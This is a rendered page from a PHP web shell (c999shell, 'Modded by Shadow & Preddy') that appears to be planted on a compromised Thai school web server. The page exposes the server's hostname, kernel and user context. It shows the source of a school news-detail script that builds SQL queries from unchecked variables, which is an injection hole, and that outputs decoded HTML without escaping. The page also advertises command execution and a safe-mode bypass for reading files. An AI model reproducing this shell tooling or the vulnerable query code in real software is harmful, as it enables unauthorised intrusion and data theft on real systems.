Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher/ drwxr-xr-x |
Viewing file: InformationDetail.php (3 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?php /** Define Validate Access */ define( '_VALID_ACCESS', 1 ); /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/Function.php" ); /** Create Database Object */ $dbObj = new DBConn; $sql = " SELECT * FROM formation_tb WHERE Code='$Code' "; $result = $dbObj->execQuery($sql); $rs = $dbObj->fetchArray($result); ?> <html> <head> <title>Information Detail</title> <link href="../css/default.css" rel="stylesheet" type="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> <body> <table width="635" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="10"></td> </tr> </table> <table width="635" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <th width="632" scope="col"><form name="form1" method="post" action=""> <fieldset> <table width="630" border="0"> <tr> <td width="624"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="30" align="center"><strong class="NOTE">ข่าวประชาสัมพันธ์</strong></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#EEEEEE" style="border:0px solid gray"> <tr> <td width="15%" align="left" valign="top" bordercolor="#003366" bgcolor="#EEEEFF"><span class="TEXT-DARK-BLUE10">รายละเอียด</span></td> <td width="85%" valign="top" bordercolor="#CCCCCC" bgcolor="#EEEEFF" class="PADDING-LEFT-5"><? echo htmlspecialchars_decode($rs['InforDetail']); ?></td> </tr> <tr> <td align="left" bordercolor="#003366" bgcolor="#EEEEFF"><span class="TEXT-DARK-BLUE10">ชื่อผู้แจ้ง</span></td> <td bordercolor="#CCCCCC" bgcolor="#EEEEFF" class="PADDING-LEFT-5"><?php $Teacher_code = $rs["Teacher_code"]; $sql = " Select * From personal_tb Where Teacher_code='$Teacher_code' "; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rss = mysql_fetch_array($result1); echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]"; ?></td> </tr> <tr> <td align="left" bordercolor="#003366" bgcolor="#EEEEFF"><span class="TEXT-DARK-BLUE10">เมล์</span></td> <td bordercolor="#CCCCCC" bgcolor="#EEEEFF" class="PADDING-LEFT-5"><? echo $rs['Organizl']; ?></td> </tr> <tr> <td colspan="2"></td> </tr> </table> </tr> </table> </fieldset> <div align="center"><br> <input type="button" name="Submit2" value=" ปิดหน้าต่าง" onClick="javascript:parent.close();" onMouseOver="this.style.cursor='hand'" /> </div> </form></th> </tr> </table> </body> </html> <?php CloseDB(); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]-- |